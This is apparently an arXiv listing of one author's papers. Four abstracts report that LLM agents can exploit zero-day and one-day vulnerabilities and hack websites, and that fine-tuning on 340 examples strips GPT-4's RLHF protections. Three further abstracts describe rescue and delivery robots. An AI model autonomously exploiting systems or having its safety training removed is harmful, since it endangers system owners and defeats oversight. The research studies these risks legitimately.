-
Teams of LLM Agents can Exploit Zero-Day Vulnerabilities
Authors:
Richard Fang,
Rohan Bindu,
Akul Gupta,
Qiusi Zhan,
Daniel Kang
Abstract:
LLM agents have become increasingly sophisticated, especially in the realm of cybersecurity. Researchers have shown that LLM agents can exploit real-world vulnerabilities when given a description of the vulnerability and toy capture-the-flag problems. However, these agents still perform poorly on real-world vulnerabilities that are unknown to the agent ahead of time (zero-day vulnerabilities).
I…
▽ More
LLM agents have become increasingly sophisticated, especially in the realm of cybersecurity. Researchers have shown that LLM agents can exploit real-world vulnerabilities when given a description of the vulnerability and toy capture-the-flag problems. However, these agents still perform poorly on real-world vulnerabilities that are unknown to the agent ahead of time (zero-day vulnerabilities).
In this work, we show that teams of LLM agents can exploit real-world, zero-day vulnerabilities. Prior agents struggle with exploring many different vulnerabilities and long-range planning when used alone. To resolve this, we introduce HPTSA, a system of agents with a planning agent that can launch subagents. The planning agent explores the system and determines which subagents to call, resolving long-term planning issues when trying different vulnerabilities. We construct a benchmark of 15 real-world vulnerabilities and show that our team of agents improve over prior work by up to 4.5$\times$.
△ Less
Submitted 2 June, 2024;
originally announced June 2024.
-
LLM Agents can Autonomously Exploit One-day Vulnerabilities
Authors:
Richard Fang,
Rohan Bindu,
Akul Gupta,
Daniel Kang
Abstract:
LLMs have becoming increasingly powerful, both in their benign and malicious uses. With the increase in capabilities, researchers have been increasingly interested in their ability to exploit cybersecurity vulnerabilities. In particular, recent work has conducted preliminary studies on the ability of LLM agents to autonomously hack websites. However, these studies are limited to simple vulnerabili…
▽ More
LLMs have becoming increasingly powerful, both in their benign and malicious uses. With the increase in capabilities, researchers have been increasingly interested in their ability to exploit cybersecurity vulnerabilities. In particular, recent work has conducted preliminary studies on the ability of LLM agents to autonomously hack websites. However, these studies are limited to simple vulnerabilities.
In this work, we show that LLM agents can autonomously exploit one-day vulnerabilities in real-world systems. To show this, we collected a dataset of 15 one-day vulnerabilities that include ones categorized as critical severity in the CVE description. When given the CVE description, GPT-4 is capable of exploiting 87% of these vulnerabilities compared to 0% for every other model we test (GPT-3.5, open-source LLMs) and open-source vulnerability scanners (ZAP and Metasploit). Fortunately, our GPT-4 agent requires the CVE description for high performance: without the description, GPT-4 can exploit only 7% of the vulnerabilities. Our findings raise questions around the widespread deployment of highly capable LLM agents.
△ Less
Submitted 17 April, 2024; v1 submitted 11 April, 2024;
originally announced April 2024.
-
LLM Agents can Autonomously Hack Websites
Authors:
Richard Fang,
Rohan Bindu,
Akul Gupta,
Qiusi Zhan,
Daniel Kang
Abstract:
In recent years, large language models (LLMs) have become increasingly capable and can now interact with tools (i.e., call functions), read documents, and recursively call themselves. As a result, these LLMs can now function autonomously as agents. With the rise in capabilities of these agents, recent work has speculated on how LLM agents would affect cybersecurity. However, not much is known abou…
▽ More
In recent years, large language models (LLMs) have become increasingly capable and can now interact with tools (i.e., call functions), read documents, and recursively call themselves. As a result, these LLMs can now function autonomously as agents. With the rise in capabilities of these agents, recent work has speculated on how LLM agents would affect cybersecurity. However, not much is known about the offensive capabilities of LLM agents.
In this work, we show that LLM agents can autonomously hack websites, performing tasks as complex as blind database schema extraction and SQL injections without human feedback. Importantly, the agent does not need to know the vulnerability beforehand. This capability is uniquely enabled by frontier models that are highly capable of tool use and leveraging extended context. Namely, we show that GPT-4 is capable of such hacks, but existing open-source models are not. Finally, we show that GPT-4 is capable of autonomously finding vulnerabilities in websites in the wild. Our findings raise questions about the widespread deployment of LLMs.
△ Less
Submitted 15 February, 2024; v1 submitted 6 February, 2024;
originally announced February 2024.
-
Removing RLHF Protections in GPT-4 via Fine-Tuning
Authors:
Qiusi Zhan,
Richard Fang,
Rohan Bindu,
Akul Gupta,
Tatsunori Hashimoto,
Daniel Kang
Abstract:
As large language models (LLMs) have increased in their capabilities, so does their potential for dual use. To reduce harmful outputs, produces and vendors of LLMs have used reinforcement learning with human feedback (RLHF). In tandem, LLM vendors have been increasingly enabling fine-tuning of their most powerful models. However, concurrent work has shown that fine-tuning can remove RLHF protectio…
▽ More
As large language models (LLMs) have increased in their capabilities, so does their potential for dual use. To reduce harmful outputs, produces and vendors of LLMs have used reinforcement learning with human feedback (RLHF). In tandem, LLM vendors have been increasingly enabling fine-tuning of their most powerful models. However, concurrent work has shown that fine-tuning can remove RLHF protections. We may expect that the most powerful models currently available (GPT-4) are less susceptible to fine-tuning attacks. In this work, we show the contrary: fine-tuning allows attackers to remove RLHF protections with as few as 340 examples and a 95% success rate. These training examples can be automatically generated with weaker models. We further show that removing RLHF protections does not decrease usefulness on non-censored outputs, providing evidence that our fine-tuning strategy does not decrease usefulness despite using weaker models to generate training data. Our results show the need for further research on protections on LLMs.
△ Less
Submitted 5 April, 2024; v1 submitted 9 November, 2023;
originally announced November 2023.
-
3-Survivor: A Rough Terrain Negotiable Teleoperated Mobile Rescue Robot with Passive Control Mechanism
Authors:
R. A. Bindu,
A. A. Neloy,
S. Alam,
S. Siddique
Abstract:
This paper presents the design and integration of 3 Survivor, a rough terrain negotiable teleoperated mobile rescue and service robot. 3 Survivor is an improved version of two previously studied surveillance robots named Sigma 3 and Alpha N. In 3 Survivor, a modified double tracked with caterpillar mechanism is incorporated in the body design. A passive adjustment established in the body balance e…
▽ More
This paper presents the design and integration of 3 Survivor, a rough terrain negotiable teleoperated mobile rescue and service robot. 3 Survivor is an improved version of two previously studied surveillance robots named Sigma 3 and Alpha N. In 3 Survivor, a modified double tracked with caterpillar mechanism is incorporated in the body design. A passive adjustment established in the body balance enables the front and rear body to operate in excellent synchronization. Instead of using an actuator, a re configurable dynamic method is constructed with a 6 DOF arm. This dynamic method is configured with the planer, spatial mechanism, rotation matrix, motion control of rotation using inverse kinematics and controlling power consumption of the manipulator using angular momentum. The robot is remotely controlled using a handheld Radio Frequency RF transmitter. 3 Survivor is equipped with a Raspberry Pi 12 MP camera which is used for livestreaming of robot operations. Object detection algorithms are run on the live video stream. The object detection method is built using a Faster RCNN with VGGNet16 architecture of CNN. The entire operations of the robot are monitored through a web control window. Therefore, the control portal provides a brief scenario of the environment to run, control and steer the robot for more precise operation. A very impressive 88.25 percent accuracy is acquired from this module in a rescue operation. Along with the ODM, the sensor system of the robot provides information on the hazardous terrain. The feasibility of the 3 Survivor is tested and presented by different experiments throughout the paper.
△ Less
Submitted 11 March, 2020;
originally announced March 2020.
-
Sigma-3: Integration and Analysis of a 6 DOF Robotic Arm Configuration in a Rescue Robot
Authors:
R. A. Bindu,
A. A. Neloy,
S. Alam,
N. J Moni,
S. Siddique
Abstract:
This paper introduces a rescue robot named Sigma 3 which is developed for potential applications such as hel** hands for humans where a human can not reach to have an assessment of the hazardous environment. Also, these kinds of robot can be controlled remotely with an adequate control system. The proposed methodology forces on two issues : 1. Novel mechanism design for measuring rotation, joint…
▽ More
This paper introduces a rescue robot named Sigma 3 which is developed for potential applications such as hel** hands for humans where a human can not reach to have an assessment of the hazardous environment. Also, these kinds of robot can be controlled remotely with an adequate control system. The proposed methodology forces on two issues : 1. Novel mechanism design for measuring rotation, joints, links of Degree of Freedom DOF for an arm which is integrated with Sigma 3, 2. Precise measuring of end effector motion control over three dimensions. In the proposed mechanism design, the DOF measurement is presented by a planar and spatial mechanism where 4 types of rigid joints build up each DOF with controlling by six High Torque MG996R servo motors. Rotation and DOF measurement are consisting of different theoretical references of Rotation Matrix, Inverse Kinematics with experimental results. Presented methodology over Oscillation Dam** performance exhibits less than 3 percent error while configuring for on hands testing. Another evaluation of operating time state strongly defends the mechanism of low power consumption ability.
△ Less
Submitted 28 April, 2020; v1 submitted 27 February, 2020;
originally announced February 2020.
-
Alpha-N: Shortest Path Finder Automated Delivery Robot with Obstacle Detection and Avoiding System
Authors:
A. A. Neloy,
R. A. Bindu,
S. Alam,
R. Haque,
M. Saif,
A. Khan,
N. M. Mishu,
S. Siddique
Abstract:
Alpha N A self-powered, wheel driven Automated Delivery Robot is presented in this paper. The ADR is capable of navigating autonomously by detecting and avoiding objects or obstacles in its path. It uses a vector map of the path and calculates the shortest path by Grid Count Method of Dijkstra Algorithm. Landmark determination with Radio Frequency Identification tags are placed in the path for ide…
▽ More
Alpha N A self-powered, wheel driven Automated Delivery Robot is presented in this paper. The ADR is capable of navigating autonomously by detecting and avoiding objects or obstacles in its path. It uses a vector map of the path and calculates the shortest path by Grid Count Method of Dijkstra Algorithm. Landmark determination with Radio Frequency Identification tags are placed in the path for identification and verification of source and destination, and also for the recalibration of the current position. On the other hand, an Object Detection Module is built by Faster RCNN with VGGNet16 architecture for supporting path planning by detecting and recognizing obstacles. The Path Planning System is combined with the output of the GCM, the RFID Reading System and also by the binary results of ODM. This PPS requires a minimum speed of 200 RPM and 75 seconds duration for the robot to successfully relocate its position by reading an RFID tag. In the result analysis phase, the ODM exhibits an accuracy of 83.75 percent, RRS shows 92.3 percent accuracy and the PPS maintains an accuracy of 85.3 percent. Stacking all these 3 modules, the ADR is built, tested and validated which shows significant improvement in terms of performance and usability comparing with other service robots.
△ Less
Submitted 28 April, 2020; v1 submitted 26 February, 2020;
originally announced February 2020.